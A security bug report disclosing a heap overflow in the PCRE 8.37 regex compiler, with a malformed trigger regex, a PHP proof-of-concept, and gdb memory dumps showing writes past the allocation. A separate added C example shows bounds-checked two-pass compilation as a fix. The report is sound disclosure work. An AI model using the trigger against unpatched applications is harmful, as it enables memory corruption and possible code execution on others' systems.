https://bugs.exim.org/show_bug.cgi?id=1667
Bug ID: 1667
Summary: PCRE Library Heap Overflow Vulnerability
Product: PCRE
Version: 8.37
Hardware: All
OS: All
Status: NEW
Severity: security
Priority: medium
Component: Code
Assignee: p...@hermes.cam.ac.uk
Reporter: rubym...@yeah.net
CC: pcre-dev@exim.org

I. Summary

PCRE is a regular expression C library inspired by the regular expression capabilities of the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx and PHP.

The PCRE library is prone to a vulnerability which leads to a heap overflow. During the compilation of a malformed regular expression, more data is written to the malloc'ed block than the expected size computed by compile_regex. Exploits using advanced heap feng shui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application.

------------------------------------------------------------------

II. Description

The latest version of PCRE is prone to a heap overflow vulnerability which can be triggered by the following regular expression:

/(?J:(?|(:(?|(?'R')(\k'R')|((?'R')))H'Rk'Rf)|s(?'R'))))/

To reproduce the problem, use pcretest, which is provided with the PCRE library, or an application that wraps PCRE, such as PHP. For pcretest, simply type the regular expression at the re> prompt. For PHP, the latest version, PHP 5.6.11 (bundled with PCRE 8.37), can be triggered by the following code snippet:

<?php
preg_match("/(?J:(?|(:(?|(?'R')(\k'R')|((?'R')))H'Rk'Rf)|s(?'R'))))/","ADLAB",$arr);
?>

First, pcre_compile2 invokes compile_regex() to calculate the size of memory needed to store the compiled regular expression. re then points to newly allocated memory of that size. Next, pcre_compile2 invokes compile_regex() again to fill the compiled regular expression into the allocated memory. The problem is that the second pass writes more data than the first pass expected.
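The "measure, allocate, emit" structure described above is a general pattern, and the defensive fix for its failure mode is also general: the emit pass should write through a bounded cursor and the two lengths should be compared afterwards, so that a disagreement between the passes becomes a compile error rather than a silent heap overflow. The following C program is an added example and is not PCRE's code; it compiles a toy pattern language (single-letter named groups "<R>", references "\R" to every group named R, literals otherwise) into hypothetical opcodes. The divergence between the passes is constructed for illustration: the measure pass builds the name table as it goes, so a reference that precedes a later duplicate-named group is counted shorter than the emit pass, which consults the completed table, will write.

```c
/* Added example, not PCRE code: a two-pass "measure, allocate, emit" compiler
 * for a toy pattern language. The emit pass writes through a bounded cursor
 * that refuses to go past the size computed by the measure pass, so a pass
 * mismatch becomes a compile error instead of a heap overflow. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical opcodes for the toy bytecode. */
enum { OP_CHAR = 1, OP_GROUP_OPEN = 2, OP_BACKREF = 4, OP_END = 5 };
#define MAX_GROUPS 8

/* Output cursor. With buf == NULL the pass only counts bytes; with a buffer,
 * each write is checked against cap and an overrun is recorded, not written. */
typedef struct { unsigned char *buf; size_t cap; size_t len; int overrun; } emitter;

static void put(emitter *e, unsigned char b) {
    if (e->buf) {
        if (e->len >= e->cap) { e->overrun = 1; e->len++; return; }
        e->buf[e->len] = b;
    }
    e->len++;
}

/* Groups by single-letter name: "<R>" opens a group named R (duplicate names
 * allowed), "\R" references every group named R, anything else is a literal. */
typedef struct { int count[26]; unsigned char num[26][MAX_GROUPS]; } name_table;

/* One pass over the pattern. `build` says whether this pass fills the name
 * table as it goes (measure pass) or consults a completed one (emit pass).
 * That difference is the constructed divergence: a reference that precedes a
 * later duplicate-named group is shorter in the measure pass. */
static int compile_pass(const char *pat, emitter *e, name_table *names, int build) {
    int group_no = 0;
    for (const char *p = pat; *p; p++) {
        if (*p == '<' && p[1] >= 'A' && p[1] <= 'Z' && p[2] == '>') {
            int idx = p[1] - 'A';
            if (++group_no > 255) return -1;
            if (build) {
                if (names->count[idx] >= MAX_GROUPS) return -1;
                names->num[idx][names->count[idx]++] = (unsigned char)group_no;
            }
            put(e, OP_GROUP_OPEN); put(e, (unsigned char)group_no);
            p += 2;
        } else if (*p == '\\' && p[1] >= 'A' && p[1] <= 'Z') {
            int idx = p[1] - 'A';
            put(e, OP_BACKREF); put(e, (unsigned char)names->count[idx]);
            for (int i = 0; i < names->count[idx]; i++) put(e, names->num[idx][i]);
            p += 1;
        } else {
            put(e, OP_CHAR); put(e, (unsigned char)*p);
        }
    }
    put(e, OP_END);
    return 0;
}

/* Returns the compiled size (> 0) and sets *out, or -1 on a syntax error and
 * -2 when the emit pass tried to write past the measured size. On -2 the
 * buffer is freed and no byte beyond the allocation was ever touched. */
static long compile_pattern(const char *pat, unsigned char **out) {
    name_table names;
    memset(&names, 0, sizeof names);
    emitter measure = { NULL, 0, 0, 0 };
    if (compile_pass(pat, &measure, &names, 1) != 0) return -1;
    unsigned char *buf = malloc(measure.len);
    if (buf == NULL) return -1;
    emitter emit = { buf, measure.len, 0, 0 };
    compile_pass(pat, &emit, &names, 0);
    if (emit.overrun || emit.len != measure.len) { free(buf); return -2; }
    *out = buf;
    return (long)measure.len;
}

/* Small wrappers so results can be checked without managing the buffer. */
static long compiled_size(const char *pat) {
    unsigned char *out = NULL;
    long n = compile_pattern(pat, &out);
    free(out);
    return n;
}
static int compiled_byte(const char *pat, size_t i) {
    unsigned char *out = NULL;
    long n = compile_pattern(pat, &out);
    int b = (n > 0 && i < (size_t)n) ? out[i] : -1;
    free(out);
    return b;
}

int main(void) {
    const char *cases[] = { "<R>ab\\R", "<R>a\\R<R>b", "\\R<R>", "hello" };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        long n = compiled_size(cases[i]);
        if (n == -2) printf("%-12s rejected: emit pass exceeded measured size\n", cases[i]);
        else printf("%-12s compiled to %ld bytes\n", cases[i], n);
    }
    return 0;
}
```

The pattern "<R>ab\R" compiles to 10 bytes because the reference follows the only group named R, so both passes agree; "<R>a\R<R>b" and "\R<R>" are rejected with -2 because the emit pass would need one more byte per later duplicate group than the measure pass reserved. The same `len != cap` comparison after the second pass is the cheap regression check a maintainer can add to any two-pass compiler.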
The following test was carried out under Ubuntu 14.10 x64 with PHP 5.6.11:

==============================================================
gdb php poc.php
9292        re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) print size
$2=184
(gdb) n
9293        if (re == NULL)
(gdb) x/x $rax
0x1f87050:      0x78
(gdb) c
9368        *code = OP_BRA;
9369        (void)compile_regex(re->options, &code, &ptr, &errorcode, FALSE, FALSE, 0, 0,
9370            &firstchar, &firstcharflags, &reqchar, &reqcharflags, NULL, cd, NULL);
==============================================================

So the expected size of the above regular expression is 184, and the base address of the allocated memory is 0x1f87050. Here is the layout of 0x1f87050 just before the second compile_regex() (the bracketed range is the 184-byte allocation, 0x1f87050 to 0x1f87107):

==============================================================
(gdb) x/192b 0x1f87050
0x1f87050: [0x45 0x52 0x43 0x50 0xb8 0x00 0x00 0x00
0x1f87058:  0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1f87060:  0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1f87068:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f87070:  0xff 0xff 0x40 0x00 0x04 0x00 0x03 0x00
0x1f87078:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f87080:  0x30 0x77 0xf8 0x01 0x00 0x00 0x00 0x00
0x1f87088:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f87090:  0x00 0x02 0x52 0x00 0x00 0x03 0x52 0x00
0x1f87098:  0x00 0x01 0x52 0x00 0x00 0x00 0x00 0x00
0x1f870a0:  0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00
0x1f870a8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870b0:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870b8:  0xa0 0x76 0x34 0xf7 0xff 0x7f 0x00 0x00
0x1f870c0:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870c8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870d0:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870d8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870e0:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870e8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870f0:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f870f8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f87100:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00]
0x1f87108:  0x11 0x01 0x00 0x00 0x00 0x00 0x00 0x00
==============================================================

After the second compile_regex() (bytes written outside the allocation are marked with *):

==============================================================
(gdb) x/192b 0x1f87050
0x1f87050: [0x45 0x52 0x43 0x50 0xb8 0x00 0x00 0x00
0x1f87058:  0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1f87060:  0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1f87068:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f87070:  0xff 0xff 0x40 0x00 0x04 0x00 0x03 0x00
0x1f87078:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f87080:  0x30 0x77 0xf8 0x01 0x00 0x00 0x00 0x00
0x1f87088:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1f87090:  0x00 0x02 0x52 0x00 0x00 0x03 0x52 0x00
0x1f87098:  0x00 0x01 0x52 0x00 0x83 0x00 0x6e 0x83
0x1f870a0:  0x00 0x68 0x83 0x00 0x55 0x81 0x00 0x4f
0x1f870a8:  0x85 0x00 0x49 0x00 0x01 0x1d 0x3a 0x83
0x1f870b0:  0x00 0x1e 0x85 0x00 0x05 0x00 0x02 0x78
0x1f870b8:  0x00 0x05 0x81 0x00 0x10 0x85 0x00 0x0a
0x1f870c0:  0x00 0x03 0x73 0x00 0x00 0x00 0x03 0x78
0x1f870c8:  0x00 0x0a 0x78 0x00 0x10 0x77 0x00 0x13
0x1f870d0:  0x85 0x00 0x0d 0x00 0x02 0x85 0x00 0x05
0x1f870d8:  0x00 0x03 0x78 0x00 0x05 0x78 0x00 0x0d
0x1f870e0:  0x78 0x00 0x31 0x1d 0x48 0x1d 0x27 0x1d
0x1f870e8:  0x52 0x1d 0x6b 0x1d 0x27 0x1d 0x52 0x1d
0x1f870f0:  0x66 0x78 0x00 0x49 0x78 0x00 0x4f 0x77
0x1f870f8:  0x00 0x0d 0x1d 0x73 0x85 0x00 0x05 0x00
0x1f87100:  0x01 0x78 0x00 0x05 0x78 0x00 0x62 0x78]
0x1f87108: *0x00 *0x68 *0x78 *0x00 *0x6e 0x00 0x00 0x00
==============================================================

Obviously, at least 5 more bytes are written to the heap in this case. This overflow can be used to modify the adjacent length field of an array/vector/string, giving the attacker the ability to read/write the whole memory in the context of the affected application (the same trick as CVE-2013-0634).

------------------------------------------------------------------

III. Impact

Heap overflow.

------------------------------------------------------------------

IV. Affected

The latest version of PCRE is confirmed to be vulnerable. Other applications may also be affected.

------------------------------------------------------------------

V. Credit

Wen Guanxing from Venustech ADLAB is credited for this vulnerability.

--
List details at https://lists.exim.org/mailman/listinfo/pcre-dev